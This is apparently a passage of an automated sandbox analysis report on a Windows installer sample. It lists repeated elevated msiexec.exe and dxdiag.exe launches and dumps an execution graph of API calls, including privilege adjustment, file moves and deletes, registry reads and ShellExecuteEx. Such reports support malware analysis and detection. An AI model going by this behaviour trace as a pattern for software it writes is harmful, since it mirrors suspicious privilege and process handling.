                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                                Execution Graph

                                Execution Coverage:26.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:17.1%
                                Total number of Nodes:1328
                                Total number of Limit Nodes:34
API calls 3453 405bf6 3452->3453 3454 405c10 3453->3454 3455 405bfa 3453->3455 3457 4053d1 28 API calls 3454->3457 3459 4053d1 28 API calls 3455->3459 3455->3465 3457->3465 3458 405b9b FindNextFileA 3460 405bb3 FindClose 3458->3460 3458->3468 3461 405c07 3459->3461 3460->3440 3462 406066 40 API calls 3461->3462 3462->3465 3464 405a4f 64 API calls 3464->3468 3466 4053d1 28 API calls 3466->3458 3467 4053d1 28 API calls 3467->3468 3468->3450 3468->3458 3468->3464 3468->3466 3468->3467 3469 406066 40 API calls 3468->3469 3489 40628d lstrcpynA 3468->3489 3490 405a07 3468->3490 3469->3468 3501 40628d lstrcpynA 3470->3501 3472 405d1e 3473 405cb8 4 API calls 3472->3473 3475 405d24 3473->3475 3474 405a6f 3474->3436 3474->3437 3475->3474 3476 406587 5 API calls 3475->3476 3482 405d34 3476->3482 3477 405d5f lstrlenA 3478 405d6a 3477->3478 3477->3482 3479 405c1f 3 API calls 3478->3479 3481 405d6f GetFileAttributesA 3479->3481 3480 406620 2 API calls 3480->3482 3481->3474 3482->3474 3482->3477 3482->3480 3483 405c66 2 API calls 3482->3483 3483->3477 3484->3439 3486 405c73 3485->3486 3487 405c84 3486->3487 3488 405c78 CharPrevA 3486->3488 3487->3445 3488->3486 3488->3487 3489->3468 3502 405dfb GetFileAttributesA 3490->3502 3493 405a22 RemoveDirectoryA 3496 405a30 3493->3496 3494 405a2a DeleteFileA 3494->3496 3495 405a34 3495->3468 3496->3495 3497 405a40 SetFileAttributesA 3496->3497 3497->3495 3499 405bea 3498->3499 3500 405c39 lstrcatA 3498->3500 3499->3452 3500->3499 3501->3472 3503 405a13 3502->3503 3504 405e0d SetFileAttributesA 3502->3504 3503->3493 3503->3494 3503->3495 3504->3503 3505 4033d8 SetErrorMode GetVersionExA 3506 40342a GetVersionExA 3505->3506 3508 403469 3505->3508 3507 403446 3506->3507 3506->3508 3507->3508 3509 4034ed 3508->3509 3510 4066b5 5 API calls 3508->3510 3511 406647 3 API calls 3509->3511 3510->3509 3512 403503 lstrlenA 3511->3512 3512->3509 3513 403513 3512->3513 3514 4066b5 5 API calls 3513->3514 3515 40351a 3514->3515 3516 4066b5 5 API calls 
3515->3516 3517 403521 3516->3517 3518 4066b5 5 API calls 3517->3518 3519 40352d #17 OleInitialize SHGetFileInfoA 3518->3519 3594 40628d lstrcpynA 3519->3594 3522 40357b GetCommandLineA 3595 40628d lstrcpynA 3522->3595 3524 40358d 3525 405c4a CharNextA 3524->3525 3526 4035b4 CharNextA 3525->3526 3532 4035c3 3526->3532 3527 403689 3528 40369d GetTempPathA 3527->3528 3596 4033a7 3528->3596 3530 4036b5 3533 4036b9 GetWindowsDirectoryA lstrcatA 3530->3533 3534 40370f DeleteFileA 3530->3534 3531 405c4a CharNextA 3531->3532 3532->3527 3532->3531 3537 40368b 3532->3537 3536 4033a7 12 API calls 3533->3536 3606 402f31 GetTickCount GetModuleFileNameA 3534->3606 3539 4036d5 3536->3539 3690 40628d lstrcpynA 3537->3690 3538 403722 3541 4037ba ExitProcess OleUninitialize 3538->3541 3550 405c4a CharNextA 3538->3550 3576 4037a7 3538->3576 3539->3534 3540 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3539->3540 3543 4033a7 12 API calls 3540->3543 3544 4037d1 3541->3544 3545 403928 3541->3545 3546 403707 3543->3546 3693 4059a3 3544->3693 3548 403930 GetCurrentProcess OpenProcessToken 3545->3548 3549 4039a6 ExitProcess 3545->3549 3546->3534 3546->3541 3554 403976 3548->3554 3555 403947 LookupPrivilegeValueA AdjustTokenPrivileges 3548->3555 3558 40373c 3550->3558 3553 4037b7 3553->3541 3557 4066b5 5 API calls 3554->3557 3555->3554 3559 40397d 3557->3559 3560 403781 3558->3560 3561 4037e6 3558->3561 3562 403992 ExitWindowsEx 3559->3562 3565 40399f 3559->3565 3564 405d0d 18 API calls 3560->3564 3563 40590e 5 API calls 3561->3563 3562->3549 3562->3565 3567 4037eb lstrlenA 3563->3567 3566 40378d 3564->3566 3569 40140b 2 API calls 3565->3569 3566->3541 3691 40628d lstrcpynA 3566->3691 3697 40628d lstrcpynA 3567->3697 3569->3549 3570 403803 3572 40381b 3570->3572 3698 40628d lstrcpynA 3570->3698 3577 403839 wsprintfA 3572->3577 3593 403867 3572->3593 3573 40379c 3692 40628d lstrcpynA 3573->3692 3634 403a96 3576->3634 3578 406320 21 API calls 3577->3578 
3578->3572 3579 405897 2 API calls 3579->3593 3580 4058f1 2 API calls 3580->3593 3581 403877 GetFileAttributesA 3583 403883 DeleteFileA 3581->3583 3581->3593 3582 4038af SetCurrentDirectoryA 3584 406066 40 API calls 3582->3584 3583->3593 3586 4038be CopyFileA 3584->3586 3585 4038aa 3585->3541 3586->3541 3586->3593 3587 405a4f 71 API calls 3587->3593 3588 406066 40 API calls 3588->3593 3589 406320 21 API calls 3589->3593 3590 405926 2 API calls 3590->3593 3591 403918 CloseHandle 3591->3541 3592 406620 2 API calls 3592->3593 3593->3541 3593->3572 3593->3577 3593->3579 3593->3580 3593->3581 3593->3582 3593->3585 3593->3587 3593->3588 3593->3589 3593->3590 3593->3591 3593->3592 3594->3522 3595->3524 3597 406587 5 API calls 3596->3597 3599 4033b3 3597->3599 3598 4033bd 3598->3530 3599->3598 3600 405c1f 3 API calls 3599->3600 3601 4033c5 3600->3601 3602 4058f1 2 API calls 3601->3602 3603 4033cb 3602->3603 3604 405e4f 2 API calls 3603->3604 3605 4033d6 3604->3605 3605->3530 3699 405e20 GetFileAttributesA CreateFileA 3606->3699 3608 402f71 3628 402f81 3608->3628 3700 40628d lstrcpynA 3608->3700 3610 402f97 3611 405c66 2 API calls 3610->3611 3612 402f9d 3611->3612 3701 40628d lstrcpynA 3612->3701 3614 402fa8 GetFileSize 3615 4030a2 3614->3615 3626 402fbf 3614->3626 3702 402ecd 3615->3702 3617 4030ab 3619 4030db GlobalAlloc 3617->3619 3617->3628 3714 403390 SetFilePointer 3617->3714 3618 40337a ReadFile 3618->3626 3713 403390 SetFilePointer 3619->3713 3620 40310e 3624 402ecd 6 API calls 3620->3624 3623 4030f6 3627 403168 35 API calls 3623->3627 3624->3628 3625 4030c4 3629 40337a ReadFile 3625->3629 3626->3615 3626->3618 3626->3620 3626->3628 3630 402ecd 6 API calls 3626->3630 3632 403102 3627->3632 3628->3538 3631 4030cf 3629->3631 3630->3626 3631->3619 3631->3628 3632->3628 3632->3632 3633 40313f SetFilePointer 3632->3633 3633->3628 3635 4066b5 5 API calls 3634->3635 3636 403aaa 3635->3636 3637 403ab0 3636->3637 3638 403ac2 3636->3638 3723 4061eb wsprintfA 3637->3723 3639 
406174 3 API calls 3638->3639 3640 403aed 3639->3640 3642 403b0b lstrcatA 3640->3642 3644 406174 3 API calls 3640->3644 3643 403ac0 3642->3643 3715 403d5b 3643->3715 3644->3642 3647 405d0d 18 API calls 3648 403b3d 3647->3648 3649 403bc6 3648->3649 3651 406174 3 API calls 3648->3651 3650 405d0d 18 API calls 3649->3650 3652 403bcc 3650->3652 3653 403b69 3651->3653 3654 403bdc LoadImageA 3652->3654 3655 406320 21 API calls 3652->3655 3653->3649 3658 403b85 lstrlenA 3653->3658 3662 405c4a CharNextA 3653->3662 3656 403c82 3654->3656 3657 403c03 RegisterClassA 3654->3657 3655->3654 3661 40140b 2 API calls 3656->3661 3659 403c8c 3657->3659 3660 403c39 SystemParametersInfoA CreateWindowExA 3657->3660 3663 403b93 lstrcmpiA 3658->3663 3664 403bb9 3658->3664 3659->3553 3660->3656 3665 403c88 3661->3665 3667 403b83 3662->3667 3663->3664 3668 403ba3 GetFileAttributesA 3663->3668 3666 405c1f 3 API calls 3664->3666 3665->3659 3669 403d5b 22 API calls 3665->3669 3670 403bbf 3666->3670 3667->3658 3671 403baf 3668->3671 3672 403c99 3669->3672 3724 40628d lstrcpynA 3670->3724 3671->3664 3674 405c66 2 API calls 3671->3674 3675 403ca5 ShowWindow 3672->3675 3676 403d28 3672->3676 3674->3664 3678 406647 3 API calls 3675->3678 3677 4054a3 5 API calls 3676->3677 3679 403d2e 3677->3679 3680 403cbd 3678->3680 3681 403d32 3679->3681 3682 403d4a 3679->3682 3683 403ccb GetClassInfoA 3680->3683 3685 406647 3 API calls 3680->3685 3681->3659 3688 40140b 2 API calls 3681->3688 3684 40140b 2 API calls 3682->3684 3686 403cf5 DialogBoxParamA 3683->3686 3687 403cdf GetClassInfoA RegisterClassA 3683->3687 3684->3659 3685->3683 3689 40140b 2 API calls 3686->3689 3687->3686 3688->3659 3689->3659 3690->3528 3691->3573 3692->3576 3694 4059b8 3693->3694 3695 4037de ExitProcess 3694->3695 3696 4059cc MessageBoxIndirectA 3694->3696 3696->3695 3697->3570 3698->3572 3699->3608 3700->3610 3701->3614 3703 402ed6 3702->3703 3704 402eee 3702->3704 3705 402ee6 3703->3705 3706 402edf DestroyWindow 3703->3706 3707 
402ef6 3704->3707 3708 402efe GetTickCount 3704->3708 3705->3617 3706->3705 3709 4066f1 2 API calls 3707->3709 3710 402f0c CreateDialogParamA ShowWindow 3708->3710 3711 402f2f 3708->3711 3712 402efc 3709->3712 3710->3711 3711->3617 3712->3617 3713->3623 3714->3625 3716 403d6f 3715->3716 3725 4061eb wsprintfA 3716->3725 3718 403de0 3719 403e14 22 API calls 3718->3719 3721 403de5 3719->3721 3720 403b1b 3720->3647 3721->3720 3722 406320 21 API calls 3721->3722 3722->3721 3723->3643 3724->3649 3725->3718 3892 402758 3893 402a6c 3892->3893 3894 40275f 3892->3894 3895 402c3c 21 API calls 3894->3895 3896 402766 3895->3896 3897 402775 SetFilePointer 3896->3897 3897->3893 3898 402785 3897->3898 3900 4061eb wsprintfA 3898->3900 3900->3893 3901 401e5a GetDC 3902 402c3c 21 API calls 3901->3902 3903 401e6c GetDeviceCaps MulDiv ReleaseDC 3902->3903 3904 402c3c 21 API calls 3903->3904 3905 401e9d 3904->3905 3906 406320 21 API calls 3905->3906 3907 401eda CreateFontIndirectA 3906->3907 3908 40264d 3907->3908 2900 4015e0 2919 402c5e 2900->2919 2904 401649 2906 401677 2904->2906 2907 40164e 2904->2907 2910 401423 28 API calls 2906->2910 2941 401423 2907->2941 2915 40166f 2910->2915 2914 401660 SetCurrentDirectoryA 2914->2915 2916 401631 GetFileAttributesA 2918 4015ef 2916->2918 2918->2904 2918->2916 2931 405c4a 2918->2931 2935 40590e 2918->2935 2938 405897 CreateDirectoryA 2918->2938 2945 4058f1 CreateDirectoryA 2918->2945 2920 402c6a 2919->2920 2948 406320 2920->2948 2923 4015e7 2925 405cb8 CharNextA CharNextA 2923->2925 2926 405ce3 2925->2926 2927 405cd3 2925->2927 2929 405c4a CharNextA 2926->2929 2930 405d03 2926->2930 2927->2926 2928 405cde CharNextA 2927->2928 2928->2930 2929->2926 2930->2918 2932 405c50 2931->2932 2933 405c63 2932->2933 2934 405c56 CharNextA 2932->2934 2933->2918 2934->2932 2936 4066b5 5 API calls 2935->2936 2937 405915 2936->2937 2937->2918 2939 4058e3 2938->2939 2940 4058e7 GetLastError 2938->2940 2939->2918 2940->2939 2995 4053d1 2941->2995 2944 40628d 
lstrcpynA 2944->2914 2946 405901 2945->2946 2947 405905 GetLastError 2945->2947 2946->2918 2947->2946 2963 40632d 2948->2963 2949 40656e 2950 402c8b 2949->2950 2987 40628d lstrcpynA 2949->2987 2950->2923 2965 406587 2950->2965 2952 406545 lstrlenA 2952->2963 2955 406320 15 API calls 2955->2952 2957 40644c GetSystemDirectoryA 2957->2963 2958 406462 GetWindowsDirectoryA 2958->2963 2959 406587 5 API calls 2959->2963 2960 406320 15 API calls 2960->2963 2961 4064ee lstrcatA 2961->2963 2963->2949 2963->2952 2963->2955 2963->2957 2963->2958 2963->2959 2963->2960 2963->2961 2964 4064c5 SHGetPathFromIDListA CoTaskMemFree 2963->2964 2974 406174 2963->2974 2979 4066b5 GetModuleHandleA 2963->2979 2985 4061eb wsprintfA 2963->2985 2986 40628d lstrcpynA 2963->2986 2964->2963 2971 406593 2965->2971 2966 4065fb 2967 4065ff CharPrevA 2966->2967 2969 40661a 2966->2969 2967->2966 2968 4065f0 CharNextA 2968->2966 2968->2971 2969->2923 2970 405c4a CharNextA 2970->2971 2971->2966 2971->2968 2971->2970 2972 4065de CharNextA 2971->2972 2973 4065eb CharNextA 2971->2973 2972->2971 2973->2968 2988 406113 2974->2988 2977 4061a8 RegQueryValueExA RegCloseKey 2978 4061d7 2977->2978 2978->2963 2980 4066d1 2979->2980 2981 4066db GetProcAddress 2979->2981 2992 406647 GetSystemDirectoryA 2980->2992 2984 4066ea 2981->2984 2983 4066d7 2983->2981 2983->2984 2984->2963 2985->2963 2986->2963 2987->2950 2989 406122 2988->2989 2990 406126 2989->2990 2991 40612b RegOpenKeyExA 2989->2991 2990->2977 2990->2978 2991->2990 2993 406669 wsprintfA LoadLibraryExA 2992->2993 2993->2983 2996 4053ec 2995->2996 3005 401431 2995->3005 2997 405409 lstrlenA 2996->2997 2998 406320 21 API calls 2996->2998 2999 405432 2997->2999 3000 405417 lstrlenA 2997->3000 2998->2997 3002 405445 2999->3002 3003 405438 SetWindowTextA 2999->3003 3001 405429 lstrcatA 3000->3001 3000->3005 3001->2999 3004 40544b SendMessageA SendMessageA SendMessageA 3002->3004 3002->3005 3003->3002 3004->3005 3005->2944 3909 4016e0 3910 402c5e 21 API calls 
3909->3910 3911 4016e6 GetFullPathNameA 3910->3911 3912 40171e 3911->3912 3913 4016fd 3911->3913 3914 401732 GetShortPathNameA 3912->3914 3915 402aea 3912->3915 3913->3912 3916 406620 2 API calls 3913->3916 3914->3915 3917 40170e 3916->3917 3917->3912 3919 40628d lstrcpynA 3917->3919 3919->3912 3920 404463 lstrcpynA lstrlenA 3125 405969 ShellExecuteExA 3144 401eea 3145 402c3c 21 API calls 3144->3145 3146 401ef0 3145->3146 3147 402c3c 21 API calls 3146->3147 3148 401efc 3147->3148 3149 401f13 EnableWindow 3148->3149 3150 401f08 ShowWindow 3148->3150 3151 402aea 3149->3151 3150->3151 3152 40176b 3153 402c5e 21 API calls 3152->3153 3154 401772 3153->3154 3158 405e4f 3154->3158 3156 401779 3157 405e4f 2 API calls 3156->3157 3157->3156 3159 405e5a GetTickCount GetTempFileNameA 3158->3159 3160 405e8b 3159->3160 3161 405e87 3159->3161 3160->3156 3161->3159 3161->3160 3921 40196c 3922 402c5e 21 API calls 3921->3922 3923 401973 lstrlenA 3922->3923 3924 40264d 3923->3924 3925 401ff0 3926 402c5e 21 API calls 3925->3926 3927 401ff7 3926->3927 3928 406620 2 API calls 3927->3928 3929 401ffd 3928->3929 3931 40200f 3929->3931 3932 4061eb wsprintfA 3929->3932 3932->3931 3933 4014f4 SetForegroundWindow 3934 402aea 3933->3934 3935 404778 3936 404788 3935->3936 3937 4047ae 3935->3937 3939 40432d 22 API calls 3936->3939 3938 404394 8 API calls 3937->3938 3941 4047ba 3938->3941 3940 404795 SetDlgItemTextA 3939->3940 3940->3937 3737 40177e 3738 402c5e 21 API calls 3737->3738 3739 401785 3738->3739 3740 4017a3 3739->3740 3741 4017ab 3739->3741 3776 40628d lstrcpynA 3740->3776 3777 40628d lstrcpynA 3741->3777 3744 4017b6 3746 405c1f 3 API calls 3744->3746 3745 4017a9 3748 406587 5 API calls 3745->3748 3747 4017bc lstrcatA 3746->3747 3747->3745 3770 4017c8 3748->3770 3749 406620 2 API calls 3749->3770 3751 405dfb 2 API calls 3751->3770 3752 4017df CompareFileTime 3752->3770 3753 4018a3 3755 4053d1 28 API calls 3753->3755 3754 40187a 3756 4053d1 28 API calls 3754->3756 3764 40188f 3754->3764 
3757 4018ad 3755->3757 3756->3764 3758 403168 35 API calls 3757->3758 3760 4018c0 3758->3760 3759 40628d lstrcpynA 3759->3770 3761 4018d4 SetFileTime 3760->3761 3763 4018e6 CloseHandle 3760->3763 3761->3763 3762 406320 21 API calls 3762->3770 3763->3764 3765 4018f7 3763->3765 3766 4018fc 3765->3766 3767 40190f 3765->3767 3768 406320 21 API calls 3766->3768 3769 406320 21 API calls 3767->3769 3771 401904 lstrcatA 3768->3771 3772 401917 3769->3772 3770->3749 3770->3751 3770->3752 3770->3753 3770->3754 3770->3759 3770->3762 3773 4059a3 MessageBoxIndirectA 3770->3773 3775 405e20 GetFileAttributesA CreateFileA 3770->3775 3771->3772 3774 4059a3 MessageBoxIndirectA 3772->3774 3773->3770 3774->3764 3775->3770 3776->3745 3777->3744 3942 40167e 3943 402c5e 21 API calls 3942->3943 3944 401684 3943->3944 3945 406620 2 API calls 3944->3945 3946 40168a 3945->3946 3947 40197e 3948 402c3c 21 API calls 3947->3948 3949 401985 3948->3949 3950 402c3c 21 API calls 3949->3950 3951 401992 3950->3951 3952 402c5e 21 API calls 3951->3952 3953 4019a9 lstrlenA 3952->3953 3954 4019b9 3953->3954 3955 4019f9 3954->3955 3959 40628d lstrcpynA 3954->3959 3957 4019e9 3957->3955 3958 4019ee lstrlenA 3957->3958 3958->3955 3959->3957 3960 401000 3961 401037 BeginPaint GetClientRect 3960->3961 3962 40100c DefWindowProcA 3960->3962 3964 4010f3 3961->3964 3965 401179 3962->3965 3966 401073 CreateBrushIndirect FillRect DeleteObject 3964->3966 3967 4010fc 3964->3967 3966->3964 3968 401102 CreateFontIndirectA 3967->3968 3969 401167 EndPaint 3967->3969 3968->3969 3970 401112 6 API calls 3968->3970 3969->3965 3970->3969 3971 401502 3972 401507 3971->3972 3974 40152d 3971->3974 3973 402c3c 21 API calls 3972->3973 3973->3974 3975 401a83 3976 402c3c 21 API calls 3975->3976 3977 401a8c 3976->3977 3978 402c3c 21 API calls 3977->3978 3979 401a33 3978->3979 3980 401588 3981 402a67 3980->3981 3984 4061eb wsprintfA 3981->3984 3983 402a6c 3984->3983 3985 401b88 3986 402c5e 21 API calls 3985->3986 3987 401b8f 3986->3987 
3988 402c3c 21 API calls 3987->3988 3989 401b98 wsprintfA 3988->3989 3990 402aea 3989->3990 3991 401d8a 3992 401d90 3991->3992 3993 401d9d GetDlgItem 3991->3993 3994 402c3c 21 API calls 3992->3994 3995 401d97 3993->3995 3994->3995 3996 401dde GetClientRect LoadImageA SendMessageA 3995->3996 3997 402c5e 21 API calls 3995->3997 3999 401e3f 3996->3999 4001 401e4b 3996->4001 3997->3996 4000 401e44 DeleteObject 3999->4000 3999->4001 4000->4001 4002 40278b 4003 402791 4002->4003 4004 402799 FindClose 4003->4004 4005 402aea 4003->4005 4004->4005 3162 40240d 3163 402c5e 21 API calls 3162->3163 3164 40241e 3163->3164 3165 402c5e 21 API calls 3164->3165 3166 402427 3165->3166 3167 402c5e 21 API calls 3166->3167 3168 402431 GetPrivateProfileStringA 3167->3168 4006 40280d 4007 402c5e 21 API calls 4006->4007 4008 402819 4007->4008 4009 40282f 4008->4009 4010 402c5e 21 API calls 4008->4010 4011 405dfb 2 API calls 4009->4011 4010->4009 4012 402835 4011->4012 4034 405e20 GetFileAttributesA CreateFileA 4012->4034 4014 402842 4015 4028fe 4014->4015 4016 4028e6 4014->4016 4017 40285d GlobalAlloc 4014->4017 4018 402905 DeleteFileA 4015->4018 4019 402918 4015->4019 4021 403168 35 API calls 4016->4021 4017->4016 4020 402876 4017->4020 4018->4019 4035 403390 SetFilePointer 4020->4035 4023 4028f3 CloseHandle 4021->4023 4023->4015 4024 40287c 4025 40337a ReadFile 4024->4025 4026 402885 GlobalAlloc 4025->4026 4027 402895 4026->4027 4028 4028cf 4026->4028 4029 403168 35 API calls 4027->4029 4030 405ec7 WriteFile 4028->4030 4033 4028a2 4029->4033 4031 4028db GlobalFree 4030->4031 4031->4016 4032 4028c6 GlobalFree 4032->4028 4033->4032 4034->4014 4035->4024 3169 40550f 3170 405531 GetDlgItem GetDlgItem GetDlgItem 3169->3170 3171 4056ba 3169->3171 3214 404362 SendMessageA 3170->3214 3173 4056c2 GetDlgItem CreateThread CloseHandle 3171->3173 3174 4056ea 3171->3174 3173->3174 3237 4054a3 OleInitialize 3173->3237 3176 405718 3174->3176 3177 405700 ShowWindow ShowWindow 3174->3177 3178 405739 
3174->3178 3175 4055a1 3184 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3175->3184 3179 405773 3176->3179 3181 405728 3176->3181 3182 40574c ShowWindow 3176->3182 3219 404362 SendMessageA 3177->3219 3223 404394 3178->3223 3179->3178 3185 405780 SendMessageA 3179->3185 3220 404306 3181->3220 3188 40576c 3182->3188 3189 40575e 3182->3189 3190 405616 3184->3190 3191 4055fa SendMessageA SendMessageA 3184->3191 3187 405745 3185->3187 3192 405799 CreatePopupMenu 3185->3192 3196 404306 SendMessageA 3188->3196 3195 4053d1 28 API calls 3189->3195 3193 405629 3190->3193 3194 40561b SendMessageA 3190->3194 3191->3190 3197 406320 21 API calls 3192->3197 3215 40432d 3193->3215 3194->3193 3195->3188 3196->3179 3199 4057a9 AppendMenuA 3197->3199 3201 4057c7 GetWindowRect 3199->3201 3202 4057da TrackPopupMenu 3199->3202 3200 405639 3203 405642 ShowWindow 3200->3203 3204 405676 GetDlgItem SendMessageA 3200->3204 3201->3202 3202->3187 3205 4057f6 3202->3205 3206 405665 3203->3206 3207 405658 ShowWindow 3203->3207 3204->3187 3208 40569d SendMessageA SendMessageA 3204->3208 3209 405815 SendMessageA 3205->3209 3218 404362 SendMessageA 3206->3218 3207->3206 3208->3187 3209->3209 3210 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3209->3210 3212 405854 SendMessageA 3210->3212 3212->3212 3213 405876 GlobalUnlock SetClipboardData CloseClipboard 3212->3213 3213->3187 3214->3175 3216 406320 21 API calls 3215->3216 3217 404338 SetDlgItemTextA 3216->3217 3217->3200 3218->3204 3219->3176 3221 404313 SendMessageA 3220->3221 3222 40430d 3220->3222 3221->3178 3222->3221 3224 404457 3223->3224 3225 4043ac GetWindowLongA 3223->3225 3224->3187 3225->3224 3226 4043c1 3225->3226 3226->3224 3227 4043f1 3226->3227 3228 4043ee GetSysColor 3226->3228 3229 404401 SetBkMode 3227->3229 3230 4043f7 SetTextColor 3227->3230 3228->3227 3231 404419 GetSysColor 3229->3231 3232 40441f 3229->3232 3230->3229 3231->3232 3233 404430 3232->3233 3234 404426 SetBkColor 3232->3234 3233->3224 
3235 404443 DeleteObject 3233->3235 3236 40444a CreateBrushIndirect 3233->3236 3234->3233 3235->3236 3236->3224 3244 404379 3237->3244 3239 4054ed 3240 404379 SendMessageA 3239->3240 3242 4054ff OleUninitialize 3240->3242 3241 4054c6 3241->3239 3247 401389 3241->3247 3245 404391 3244->3245 3246 404382 SendMessageA 3244->3246 3245->3241 3246->3245 3249 401390 3247->3249 3248 4013fe 3248->3241 3249->3248 3250 4013cb MulDiv SendMessageA 3249->3250 3250->3249 3251 40168f 3252 402c5e 21 API calls 3251->3252 3253 401696 3252->3253 3254 402c5e 21 API calls 3253->3254 3255 40169f 3254->3255 3256 402c5e 21 API calls 3255->3256 3257 4016a8 MoveFileA 3256->3257 3258 4016b4 3257->3258 3259 4016bb 3257->3259 3261 401423 28 API calls 3258->3261 3263 40230f 3259->3263 3265 406620 FindFirstFileA 3259->3265 3261->3263 3266 406636 FindClose 3265->3266 3267 4016ca 3265->3267 3266->3267 3267->3263 3268 406066 MoveFileExA 3267->3268 3269 406087 3268->3269 3270 40607a 3268->3270 3269->3258 3272 405ef6 3270->3272 3273 405f42 GetShortPathNameA 3272->3273 3274 405f1c 3272->3274 3276 406061 3273->3276 3277 405f57 3273->3277 3299 405e20 GetFileAttributesA CreateFileA 3274->3299 3276->3269 3277->3276 3279 405f5f wsprintfA 3277->3279 3278 405f26 CloseHandle GetShortPathNameA 3278->3276 3280 405f3a 3278->3280 3281 406320 21 API calls 3279->3281 3280->3273 3280->3276 3282 405f87 3281->3282 3300 405e20 GetFileAttributesA CreateFileA 3282->3300 3284 405f94 3284->3276 3285 405fa3 GetFileSize GlobalAlloc 3284->3285 3286 405fc5 3285->3286 3287 40605a CloseHandle 3285->3287 3288 405e98 ReadFile 3286->3288 3287->3276 3289 405fcd 3288->3289 3289->3287 3301 405d85 lstrlenA 3289->3301 3292 405fe4 lstrcpyA 3295 406006 3292->3295 3293 405ff8 3294 405d85 4 API calls 3293->3294 3294->3295 3296 40603d SetFilePointer 3295->3296 3297 405ec7 WriteFile 3296->3297 3298 406053 GlobalFree 3297->3298 3298->3287 3299->3278 3300->3284 3302 405dc6 lstrlenA 3301->3302 3303 405dce 3302->3303 3304 405d9f lstrcmpiA 
3302->3304 3303->3292 3303->3293 3304->3303 3305 405dbd CharNextA 3304->3305 3305->3302 4036 404b10 4037 404b20 4036->4037 4038 404b3c 4036->4038 4047 405987 GetDlgItemTextA 4037->4047 4039 404b42 SHGetPathFromIDListA 4038->4039 4040 404b6f 4038->4040 4042 404b52 4039->4042 4046 404b59 SendMessageA 4039->4046 4044 40140b 2 API calls 4042->4044 4043 404b2d SendMessageA 4043->4038 4044->4046 4046->4040 4047->4043 4048 401490 4049 4053d1 28 API calls 4048->4049 4050 401497 4049->4050 4051 401a12 4052 402c5e 21 API calls 4051->4052 4053 401a19 4052->4053 4054 402c5e 21 API calls 4053->4054 4055 401a22 4054->4055 4056 401a29 lstrcmpiA 4055->4056 4057 401a3b lstrcmpA 4055->4057 4058 401a2f 4056->4058 4057->4058 3410 401594 3411 4015a4 ShowWindow 3410->3411 3412 4015ab 3410->3412 3411->3412 3413 4015b9 ShowWindow 3412->3413 3414 402aea 3412->3414 3413->3414 4059 402318 4060 402c5e 21 API calls 4059->4060 4061 40231e 4060->4061 4062 402c5e 21 API calls 4061->4062 4063 402327 4062->4063 4064 402c5e 21 API calls 4063->4064 4065 402330 4064->4065 4066 406620 2 API calls 4065->4066 4067 402339 4066->4067 4068 40234a lstrlenA lstrlenA 4067->4068 4069 40233d 4067->4069 4071 4053d1 28 API calls 4068->4071 4070 4053d1 28 API calls 4069->4070 4073 